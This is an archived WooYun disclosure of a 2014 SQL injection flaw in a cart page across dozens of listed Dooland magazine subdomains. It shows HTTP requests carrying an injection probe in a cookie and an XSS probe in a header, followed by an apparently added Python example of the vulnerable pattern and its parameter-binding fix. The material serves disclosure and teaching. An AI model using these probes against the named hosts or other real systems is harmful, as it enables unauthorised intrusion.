WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2014-12-09: details reported to the vendor, awaiting the vendor's response. 2014-12-14: the vendor has actively ignored the vulnerability; details are now public.
Master SQL injection and you can go anywhere without fear
Dooland (读览天下) has far too many subsites, and they all share the same problem.
Injection page:
Of the form xx.dooland.com/float_check_cart.php
Almost every Dooland subsite is affected (there are simply too many to test them all)
autofan.dooland.com/float_check_cart.php
bhstory.dooland.com/float_check_cart.php
bjsqb.dooland.com/float_check_cart.php
bjzb.dooland.com/float_check_cart.php
bkzs.dooland.com/float_check_cart.php
blogweekly.dooland.com/float_check_cart.php
bqzs.dooland.com/float_check_cart.php
bxzj.dooland.com/float_check_cart.php
caifutang.dooland.com/float_check_cart.php
caijing.dooland.com/float_check_cart.php
caijingtianxia.dooland.com/float_check_cart.php
caikuaixinbao.dooland.com/float_check_cart.php
cbrand.dooland.com/float_check_cart.php
cbzz.dooland.com/float_check_cart.php
ccmm.dooland.com/float_check_cart.php
ceocio.dooland.com/float_check_cart.php
ceoun.dooland.com/float_check_cart.php
cgoldjewelry.dooland.com/float_check_cart.php
chaonanzhi.dooland.com/float_check_cart.php
charm.dooland.com/float_check_cart.php
chewang.dooland.com/float_check_cart.php
chinaapparel.dooland.com/float_check_cart.php
chinatoday.dooland.com/float_check_cart.php
chinattw.dooland.com/float_check_cart.php
chinaxiaokang.dooland.com/float_check_cart.php
chip.dooland.com/float_check_cart.php
ciweekly.dooland.com/float_check_cart.php
cnemag.dooland.com/float_check_cart.php
cniti.dooland.com/float_check_cart.php
COCO.dooland.com/float_check_cart.php
comicfans.dooland.com/float_check_cart.php
comicshow.dooland.com/float_check_cart.php
comicworld.dooland.com/float_check_cart.php
corp.dooland.com/float_check_cart.php
cpcfan.dooland.com/float_check_cart.php
cpcw.dooland.com/float_check_cart.php
cwsj.dooland.com/float_check_cart.php
cyb.dooland.com/float_check_cart.php
cyj.dooland.com/float_check_cart.php
daxuesheng.dooland.com/float_check_cart.php
dazhongDV.dooland.com/float_check_cart.php
dazhongsheying.dooland.com/float_check_cart.php
ddsj.dooland.com/float_check_cart.php
djnsc.dooland.com/float_check_cart.php
djnzj.dooland.com/float_check_cart.php
dmcy.dooland.com/float_check_cart.php
dnahz.dooland.com/float_check_cart.php
dutianxia.dooland.com/float_check_cart.php
dzlcgw.dooland.com/float_check_cart.php
dzqc.dooland.com/float_check_cart.php
dztzzn.dooland.com/float_check_cart.php
dzyc.dooland.com/float_check_cart.php
ebusinessreview.dooland.com/float_check_cart.php
enterainment.dooland.com/float_check_cart.php
fc.dooland.com/float_check_cart.php
ffs.dooland.com/float_check_cart.php
fh.dooland.com/float_check_cart.php
foto-video.dooland.com/float_check_cart.php
fsz.dooland.com/float_check_cart.php
fxjj.dooland.com/float_check_cart.php
FZDMAG.dooland.com/float_check_cart.php
fzfzzk.dooland.com/float_check_cart.php
ganla.dooland.com/float_check_cart.php
gaoerfudujia.dooland.com/float_check_cart.php
gjxqdb.dooland.com/float_check_cart.php
gjzb.dooland.com/float_check_cart.php
glmjpl.dooland.com/float_check_cart.php
globalpeople.dooland.com/float_check_cart.php
glxjsjb.dooland.com/float_check_cart.php
......
Testing one at random, the Art Value (艺术财经) injection page: artvalue.dooland.com/float_check_cart.php (every page involved in this SQL injection looks the same)
Refresh the page and capture the request with the Burp Suite web proxy:
GET /float_check_cart.php HTTP/1.1
Host: artvalue.dooland.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0cgkar0vhtd5f7r9e4fsn8f0l0; PHPSESSID=5t0a8hbnjeinf681rd6fuo1287; CNZZDATA672294=cnzz_eid%3D1709598733-1418108954-%26ntime%3D1418108954
X-Forwarded-For: <script>alert("XSS")</script>
Connection: keep-alive
Cache-Control: max-age=0
Modify the captured request to:
GET /float_check_cart.php HTTP/1.1
Cookie: PHPSESSID=ukraksutb9kt5miu039sjfv0g4; cart_cookie=1'"; PHPSESSID=trqemklslkchg4vvdjep2agcm0
Referer: http://artvalue.dooland.com:80/
Host: artvalue.dooland.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
The resulting error reveals the database type as MySQL and the database name as mag_list:
Filter the parameter.
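To make the bug and the one-line fix above concrete, here is an added, constructed example; it is not Dooland's float_check_cart.php, whose source the report does not show. It models a cart lookup that pastes the cart_cookie value straight into the SQL text, beside a hardened version that allow-lists the value's shape and binds it as a parameter. SQLite stands in for the site's MySQL, and the table, rows and function names are assumptions made for this illustration.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the cart table behind a page like float_check_cart.php.

    Schema and rows are assumptions for this example; SQLite stands in for MySQL.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cart (id INTEGER PRIMARY KEY, item TEXT NOT NULL)")
    conn.executemany("INSERT INTO cart VALUES (?, ?)",
                     [(1, "magazine-a"), (2, "magazine-b")])
    return conn


def lookup_cart_vulnerable(conn, cart_cookie):
    """The pattern the report's error output implies: the cookie value becomes SQL text."""
    sql = "SELECT item FROM cart WHERE id = " + cart_cookie
    try:
        return {"ok": True, "rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        # A server that echoes this text to the client is what lets a single
        # stray quote disclose engine type and schema names, as in the report.
        return {"ok": False, "rows": [], "error": str(exc)}


def lookup_cart_hardened(conn, cart_cookie):
    """The fix: validate the value's shape, then bind it as a query parameter."""
    # Parameter filtering: a cart id is a short run of digits and nothing else.
    if not re.fullmatch(r"[0-9]{1,10}", cart_cookie or ""):
        return {"ok": False, "rows": [], "error": "invalid cart_cookie"}
    # Binding keeps the value out of the SQL grammar even if the filter is later loosened.
    rows = conn.execute("SELECT item FROM cart WHERE id = ?",
                        (int(cart_cookie),)).fetchall()
    return {"ok": True, "rows": rows, "error": None}


def demo():
    """Runs both versions against a valid id and against the report's probe value."""
    conn = make_db()
    probe = "1'\""  # the cart_cookie value from the modified request above
    return {
        "vulnerable_valid": lookup_cart_vulnerable(conn, "2"),
        "vulnerable_probe": lookup_cart_vulnerable(conn, probe),
        "hardened_valid": lookup_cart_hardened(conn, "2"),
        "hardened_probe": lookup_cart_hardened(conn, probe),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The vulnerable lookup returns the database engine's own error text for the probe value, which is the information leak the report exploited; the hardened lookup rejects it before any SQL runs and still answers a well-formed id correctly. Validation and parameter binding are kept as two separate steps on purpose: the regex documents what the field is allowed to be, and the bound parameter guarantees the value can never be parsed as SQL even if that regex is later relaxed.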
Severity: no impact. Vendor ignored.
Ignored at: 2014-12-14 17:52
None yet.